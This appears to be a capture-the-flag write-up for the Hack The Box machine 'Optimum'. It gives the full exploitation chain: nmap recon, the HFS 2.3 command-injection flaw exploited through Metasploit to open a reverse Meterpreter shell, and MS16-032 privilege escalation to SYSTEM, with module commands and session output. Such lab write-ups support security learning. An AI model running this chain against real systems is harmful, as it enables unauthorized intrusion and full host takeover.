Optimum


Contents

Intro


This box differed from all the other ones I've done so far in the sense that they want you to explicitly use the Metasploit framework.

User


Running nmap:

sudo nmap -sC -sV 10.129.34.87

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

THe machine is running version 2.3 of HttpFileServer. Coming from the last box, I've come to the realization searching for vulnerabilites from the get-go does give me pointers which are helpful.

searchsploit HttpFileServer
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results

This is what the main page looks like. There are no default credentials for HFS. There's 12 year old (as of 2026) CVE for the machine. The input for the findMacroMarker function inside of parserLib.pas is not sanitized properly - if we insert a null-byte followed by anything, we can write in any command we want, like a reverse shell with HFS' {.exec|cmd.exe /c example}. For this, metasploit can be used (as other PoCs just refused to work), we just need to configure the required parameters of RHOST, RPORT, LHOST, LPORT. Once that's done, the exploit can be run.

[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> run
...
[*] Meterpreter session 1 opened (10.10.15.55:4444 -> 10.129.34.87:49178) at 2026-05-13 12:48:35 -0500

(Meterpreter 1)(C:\Users\kostas\Desktop) >

This gives us a meterpreter shell as kostas!

Root


Looking for ways to privesc:

(Meterpreter 1)(C:\Users\kostas\Desktop) > sysinfo
Computer        : OPTIMUM
OS              : Windows Server 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

Since HFS is a 32-bit process, the meterpreter it spawned was also 32-bit. The mismatch might result in privesc methods not working properly. I changed to 64-bit via a simple migration.

(Meterpreter 1)(C:\Users\kostas\Desktop) > migrate -N explorer.exe
[*] Migrating from 3016 to 1484...
[*] Migration completed successfully.
(Meterpreter 1)(C:\Windows) > sysinfo
...
Meterpreter     : x64/windows

Following this, since this box has (supposedly) been reliant on the Metasploit framework, I'll use msfconsole's local_exploit_suggester to find ways to privesc:

[*] 10.129.34.87 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
 8   exploit/windows/local/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected!
 9   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

For what I need, which is system access, MS16_032 does the trick.

[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> set lhost tun0
lhost => 10.10.15.55
[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> run
...
[*] Meterpreter session 2 opened (10.10.15.55:4444 -> 10.129.34.87:49180) at 2026-05-13 13:40:19 -0500
(Meterpreter 2)(C:\Windows) >

With this, we get root! Good luck to anyone else attempting this box!